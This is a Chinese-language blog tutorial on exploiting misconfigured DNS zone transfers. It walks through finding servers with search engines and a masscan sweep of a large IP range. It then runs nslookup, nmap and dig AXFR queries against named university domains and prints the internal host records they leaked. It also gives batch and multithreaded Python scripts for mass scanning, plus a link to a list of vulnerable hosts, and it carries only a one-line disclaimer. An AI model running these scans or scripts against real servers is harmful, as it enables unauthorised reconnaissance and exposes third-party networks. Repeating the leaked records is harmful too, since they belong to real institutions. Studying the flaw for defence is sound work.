黑客是如何利用DNS域传送漏洞进行渗透与攻击的?

一、DNS域传送

DNS :Domain Name System

一个保存IP地址和域名相互映射关系的分布式数据库,重要的互联网基础设施,默认使用的TCP/UDP端口号是53

 

常见DNS记录类型:

1 A       IP地址记录,记录一个域名对应的IP地址
2 AAAA    IPv6 地址记录,记录一个域名对应的IPv6地址
3 CNAME   别名记录,记录一个主机的别名 
4 MX      电子邮件交换记录,记录一个邮件域名对应的IP地址,如[email protected]
5 NS      域名服务器记录 ,记录该域名由哪台域名服务器解析
6 PTR     反向记录,也即从IP地址到域名的一条记录
7 TXT     记录域名的相关文本信息

 

域传送 :DNS Zone Transfer

是指后备服务器从主服务器拷贝数据,并用得到的数据更新自身数据库,在主备服务器之间同步数据库,需要使用“DNS域传送”

 

DNS服务器分为:主服务器、备份服务器和缓存服务器

 


 

二、漏洞收集

2.1 利用网络搜索引擎收集域名服务器 

shodan:https://www.shodan.io

黑客是如何利用DNS域传送漏洞进行渗透与攻击的?_第1张图片

 

zoomeye:https://www.zoomeye.org

黑客是如何利用DNS域传送漏洞进行渗透与攻击的?_第2张图片

 

fofa:https://fofa.so

黑客是如何利用DNS域传送漏洞进行渗透与攻击的?_第3张图片

 

2.2 利用masscan收集dns服务器 

masscanhttps://github.com/robertdavidgraham/masscan

 

Debian/Ubuntu安装:

1 sudo apt-get install git gcc make libpcap-dev
2 git clone https://github.com/robertdavidgraham/masscan
3 cd masscan
4 make

 

扫描网段:

1 ./bin/masscan -p:53 -oX ns.xml --rate 160000 101.0.0.0-110.0.0.0

获得开放53端口的潜在漏洞DNS服务器对象

 

ns.xml结果去重:

 1 from lxml import etree
 2 port = None
 3 address = None
 4 parsedServers = []
 5 #Opens the file used to store single enteries.
 6 outputFile = open('ns.txt', 'a')
 7 for event, element in etree.iterparse('ns.xml', tag="host"):
 8     for child in element:
 9         if child.tag == 'address':
10             address = child.attrib['addr']
11         if child.tag == 'ports':
12             for a in child:
13                 port = a.attrib['portid']
14         if port > 1 and address > 1:
15             if address not in parsedServers:
16                 print(address)
17                 outputFile.write(address + '\n')
18                 parsedServers.append(address)
19             port = None
20             address = None
21     element.clear()
22 outputFile.close()
23 print('End…………………………')

 

2.3  目标针对 

针对某个目标域名,查询目标所处域dns服务器是否有域传送漏洞,从而获得横向渗透的机会和更多的可能性。见下文:

1 nslookup结合dig的科学利用

 

2.4 后人乘凉 

我们稍微无耻一下,用一下别人收集好的dns服务器与域名:https://github.com/lijiejie/edu-dns-zone-transfer/blob/master/vulnerable_hosts.txt

 

ps: 收集dns服务器,推测出网段与解析的域,从而检测DNS是否存在域传送漏洞

 


 

三、漏洞检测与利用

3.1 原理

1 DNS服务器配置不当,导致匿名用户利用DNS域传送协议获取某个域的所有记录;
2 通过可以实现DNS域传送协议的程序,尝试匿名进行DNS域传送,获取记录

 

3.2 危害

1 网络拓扑结构泄露给潜在的攻击者,包括一些安全性较低的内部主机,如测试服务器等。直接加快、助长攻击者的入侵过程

 

3.3 检测与利用

3.3.1  nslookup 

基本过程:

1 输入nslookup命令进入交互式shell;
2 server 命令参数设定查询将要使用的DNS服务器;
3 ls命令列出某个域中的所有域名;
4 exit命令退出

 

失败案例

现在域传送漏洞不太好找

 1 > nslookup
 2 DNS request timed out.
 3     timeout was 2 seconds.
 4 默认服务器:  UnKnown
 5 Address:  114.114.114.114
 6 
 7 > server ss2.bjfu.edu.cn
 8 默认服务器:  ss2.bjfu.edu.cn
 9 Address:  202.204.112.67
10 
11 > ls bjfu.edu.cn
12 [ss2.bjfu.edu.cn]
13 *** 无法列出域 bjfu.edu.cn: Query refused
14 DNS 服务器拒绝将区域 bjfu.edu.cn 传送到你的计算机。如果这不正确,
15 请检查 IP 地址 202.204.112.67 的 DNS 服务器上 bjfu.edu.cn 的
16 区域传送安全设置。

 

成功案例

 1 > nslookup
 2 默认服务器:  public1.114dns.com
 3 Address:  114.114.114.114
 4 
 5 > server ring.cugb.edu.cn
 6 默认服务器:  ring.cugb.edu.cn
 7 Address:  202.204.105.1
 8 
 9 > ls cugb.edu.cn
10 [ring.cugb.edu.cn]
11  cugb.edu.cn.                   NS     server = ring.cugb.edu.cn
12  cugb.edu.cn.                   A      127.0.0.1
13  acm                            A      121.194.86.2
14  bbs                            A      202.204.105.172
15  bm                             A      202.204.105.179
16  bsbm                           A      202.204.105.17
17  bslt                           A      202.204.109.241
18  cas                            A      202.204.105.97
19  ce                             A      202.204.99.249
20  chushi                         A      202.204.105.243
21  cj                             A      202.204.96.111
22  cms                            A      202.204.105.179
23  computer                       A      202.204.96.202
24  csc                            A      202.204.97.60
25  cugblx                         A      202.204.105.173
26 .
27 .
28 .
29 .
30  yx                             A      202.204.105.179
31  zhsh                           A      202.204.105.198
32  zzb                            A      202.204.105.243
33 >

 

非交互式方法 :
为了避免和nslookup交换,可以编写一个ls.bat

1 echo ls %1 | nslookup – %2

%1代表第一个参数,即xxx.edu.cn 
%2代表第二个参数,即dns.xxx.edu.cn 
echo是回声命令,原文输出传入的参数内容

 

测试dns.xxx.edu.cn服务器,可以执行命令:

1 ls.bat xxx.edu.cn dns.xxx.edu.cn

 

3.3.2 nmap

1 nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=xxx.edu.cn -p 53 -Pn dns.xxx.edu.cn

dns-zone-transfer.domain指定要查询的域

dns.xxx.edu.cn为指定的查询域名服务器

成功的话会如下所示,列出了指定域中所有的记录(如果端口屏蔽,就查不出了,不太实用):

 1 > nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=hzmc.edu.cn -p 53 -Pn dns.hzmc.edu.cn
 2 
 3 Starting Nmap 7.10 ( https://nmap.org ) at ****
 4 Nmap scan report for dns.hzmc.edu.cn (211.86.0.1)
 5 Host is up (0.38s latency).
 6 PORT   STATE SERVICE
 7 53/tcp open  domain
 8 | dns-zone-transfer:
 9 | hzmc.edu.cn.           SOA    ns.hzmc.edu.cn. root.ns.hzmc.edu.cn.
10 | hzmc.edu.cn.           NS     ns.hzmc.edu.cn.
11 | hzmc.edu.cn.           NS     dns.hzmc.edu.cn.
12 | hzmc.edu.cn.           A      211.86.0.1
13 | hzmc.edu.cn.           MX     10 ns.hzmc.edu.cn.
14 | dns.hzmc.edu.cn.       A      211.86.0.1
15 | ftp.hzmc.edu.cn.       CNAME  dns.hzmc.edu.cn.
16 | www.jwc.hzmc.edu.cn.   A      211.86.3.182
17 | www.lib.hzmc.edu.cn.   A      211.86.3.38
18 | www.spdb.hzmc.edu.cn.  A      211.86.0.3
19 | www.hzmc.edu.cn.       A      211.86.0.4
20 | www.yzzp.hzmc.edu.cn.  A      211.86.0.8
21 | www.zwc.hzmc.edu.cn.   A      211.86.2.200
22 |_hzmc.edu.cn.           SOA    ns.hzmc.edu.cn. root.ns.hzmc.edu.cn.
23 
24 Nmap done: 1 IP address (1 host up) scanned in 20.43 seconds

 

3.3.3 dig 

Windows免安装版dig下载地址:http://download.csdn.net/detail/c465869935/9700646

 

使用命令:

1 dig @dns.xxx.edu.cn axfr xxx.edu.cn

@指定域名服务器;axfr 为域传送指令;xxx.edu.cn表示要查询的域名

 

成功测试:

 1 > dig @ring.cugb.edu.cn axfr cugb.edu.cn
 2 
 3 ; <<>> DiG 9.11.0-P1 <<>> @ring.cugb.edu.cn axfr cugb.edu.cn
 4 ; (1 server found)
 5 ;; global options: +cmd
 6 cugb.edu.cn.            86400   IN      SOA     ring.cugb.edu.cn. root.cugb.edu.cn. 20130504 86400 3600 604800 10800
 7 cugb.edu.cn.            86400   IN      TXT     "v=spf1 ip4:202.204.105.6/24 ~all"
 8 cugb.edu.cn.            86400   IN      NS      ring.cugb.edu.cn.
 9 cugb.edu.cn.            86400   IN      MX      5 mail.cugb.edu.cn.
10 cugb.edu.cn.            86400   IN      A       127.0.0.1
11 cugb.edu.cn.            86400   IN      AAAA    ::1
12 acm.cugb.edu.cn.        86400   IN      A       121.194.86.2
13 bbs.cugb.edu.cn.        86400   IN      A       202.204.105.172
14 bm.cugb.edu.cn.         86400   IN      A       202.204.105.179
15 .
16 .
17 .
18 .
19 zhsh.cugb.edu.cn.       86400   IN      A       202.204.105.198
20 zzb.cugb.edu.cn.        86400   IN      A       202.204.105.243
21 cugb.edu.cn.            86400   IN      SOA     ring.cugb.edu.cn. root.cugb.edu.cn. 20130504 86400 3600 604800 10800
22 ;; Query time: 46 msec
23 ;; SERVER: 202.204.105.1#53(202.204.105.1)
24 ;; WHEN: ****
25 ;; XFR size: 114 records (messages 1, bytes 2562)

 

dig的批处理利用 For Windows

建立文件: .LandGrey-Dns-Zone-Transfer-Scan.bat

下载链接:http://download.csdn.net/detail/c465869935/9700869

写入以下内容:

1 @echo off
2 Rem Build By LandGrey
3 title Dns Zone Transfer Scan
4 echo +++++++++++++++++++++++++++++ LandGrey Dns Zone Transfer Scan bat +++++++++++++++++++++++++++++ 
5 for /f "tokens=1,2 delims= " %%i in (%cd%/dns-zone-transfer/hostlist.txt) do echo Scanning %%j & %cd%\dig.exe @%%i axfr %%j>> %cd%/dns-zone-transfer/ScanResults.txt

 

解释:

整个批处理主要是for循环一行一行的读取当前目录下的“/dns-zone-transfer/hostlist.txt”文件,进行工作; %cd% 代表bat文件当前目录;delims=指定分隔符;表示读取的一行文本以空格来分隔;当然,也可以自己修改分隔符;tokens=1,2 表示取以分隔符分隔的第一个和第二个元素;do后面是具体做的事: 一边提示正在扫描的域名,一边扫描域传送漏洞;在批处理中,%%i用来代指第一个元素,根据字母顺序(i,j,k…),%%j指代第二个元素,以此类推; dig.exe @%%i axfr %%j 即dig @dns.xxx.edu.cn axfr xxx.edu.cn的替换模版; 这就要求hostlist.txt文件中的书写格式应该为:“[dns-server] [domain]”,类似于如下的形式:

1 dns.xxx.edu.cn xxx.edu.cn

%cd%\dig.exe表示 .LandGrey-Dns-Zone-Transfer-Scan.bat文件要与dig.exe放在同一个目录下; 最后查询结果全部保存在当前目录下的:“/dns-zone-transfer/ScanResults.txt”文件中;

 

nslookup结合dig的科学利用 

如果获得了目标域名,并不清楚目标的主dns服务器时,可以通过用如下的nslookup语句,先查询目标域名的主dns服务器,然后再用dig进行DNS域传送检测,最后用python脚本实现:

1 > nslookup -type=ns landgrey.cn
2 服务器:  public1.114dns.com
3 Address:  114.114.114.114
4 
5 非权威应答:
6 landgrey.cn     nameserver = dns9.hichina.com
7 landgrey.cn     nameserver = dns10.hichina.com

 

单个查询(实用)

下载地址:https://github.com/LandGrey/dns-zone-transfer-tester/blob/master/dztester.py

 1 #!/usr/bin/env python
 2 # coding:utf-8
 3 #
 4 # Build by LandGrey 2016-12-03
 5 #
 6 
 7 import re
 8 import os
 9 import sys
10 
11 
12 def dns_zone_tranfer_finder(domain):
13     print('[+] Nslookup %s' % domain)
14     cmd_res = os.popen('nslookup -type=ns ' + domain).read()  # fetch DNS Server List
15     dns_servers = re.findall('nameserver = ([\w\.]+)', cmd_res)
16     if len(dns_servers) == 0:
17         print('[+] No DNS Server Found!\n')
18         exit(0)
19     for singledns in dns_servers:
20         print('[+] Using @%s' % singledns)
21         cmd_res = os.popen('dig @%s axfr %s' % (singledns, domain)).read()
22         # print cmd_res
23         if cmd_res.find('XFR size') > 0:
24             print('[+] Vulnerable dns server found:'), singledns
25             print(cmd_res)
26         else:
27             print('[+] No Vulnerable found')
28 
29 
30 def usage():
31     print('[+] Usage: python DZT-tester.py [domain]\n')
32 
33 
34 if __name__ == "__main__":
35     if len(sys.argv) != 2:
36         usage()
37     elif '-h' in sys.argv[1]:
38         usage()
39     else:
40         domain = sys.argv[1]
41         print('[+] Test %s' % domain)
42         dns_zone_tranfer_finder(domain)
43         print('[+] Finished!')

 

使用方式:

1 python dztester.py [domain]

 

批量查询

脚本同一目录下应有‘dns-zone-transfer’目录;'dns-zone-transfer’目录下有‘dns’子目录; 要检测的域名列表存放在‘dns-zone-transfer\domain.txt’中,一行一个;结果存在'dns-zone-transfer\dns'目录和'dns-zone-transfer\vulnerable_hosts.txt'文件中

 1 # coding:utf-8
 2 
 3 import re
 4 import os
 5 import sys
 6 import threading
 7 
 8 
 9 def dns_zone_tranfer_finder():
10     global c_index
11     while True:
12         lock.acquire()
13         if c_index >= len(DomainLists):
14             lock.release()
15             break
16         domain = DomainLists[c_index].lstrip('www.')
17         c_index += 1
18         lock.release()
19         cmd_res = os.popen('nslookup -type=ns ' + domain).read()    # fetch DNS Server List
20         dns_servers = re.findall('nameserver = ([\w\.]+)', cmd_res)
21         for server in dns_servers:
22             if len(server) < 5:
23                 server += domain
24             cmd_res = os.popen('dig @%s axfr %s +short' % (server, domain)).read()
25             if cmd_res.find('XFR size') > 0 \
26                     and cmd_res.find('Transfer failed.') < 0 \
27                     and cmd_res.find('connection timed out') < 0:
28                 lock.acquire()
29                 print('*' * 10 + ' Vulnerable dns server found:', server, '*' * 10)
30                 lock.release()
31                 with open(os.path.join(currentdir, 'dns-zone-transfer', 'vulnerable_hosts.txt'), 'a') as f:
32                     f.write('%s    %s\n' % (server.ljust(30), domain))
33                 with open(os.path.join(currentdir, 'dns-zone-transfer', 'dns', server + '.txt'), 'w') as f:
34                     f.write(cmd_res)
35 
36 
37 if __name__ == "__main__":
38     currentdir = os.path.dirname(sys.argv[0])
39     target = open(os.path.join(currentdir, 'dns-zone-transfer', 'domain.txt'))
40     DomainLists = []
41     for host in target.readlines():
42         DomainLists.append(host)
43     print(u'采集 %d 个...' % len(DomainLists))
44     threads = []
45     c_index = 0
46     lock = threading.Lock()
47     for i in range(10):
48         t = threading.Thread(target=dns_zone_tranfer_finder)
49         t.start()
50         threads.append(t)
51     for t in threads:
52         t.join()
53     print('All Done!')

 

漏洞存在标识主要是dig命令结果中出现特征字符串“XFR size”

 

运行起来类似下面这样:

1 ********** Vulnerable dns server found: nknu.nknu.edu.tw **********
2 ********** Vulnerable dns server found: ns2.ntnu.edu.tw **********
3 ********** Vulnerable dns server found: ns2.must.edu.mo **********
4 All Done!

 


 

 

四、免责声明

本文仅做技术研究,切勿用本文方法违法犯罪!

 

 


 更多独家精彩内容  扫码关注个人公众号一起Coding吧!


 

——  ——  ——  ——  —  END  ——  ——  ——  ——  ———— 

         欢迎扫码关注我的公众号

          小鸿星空科技

       

 

你可能感兴趣的:(黑客是如何利用DNS域传送漏洞进行渗透与攻击的?)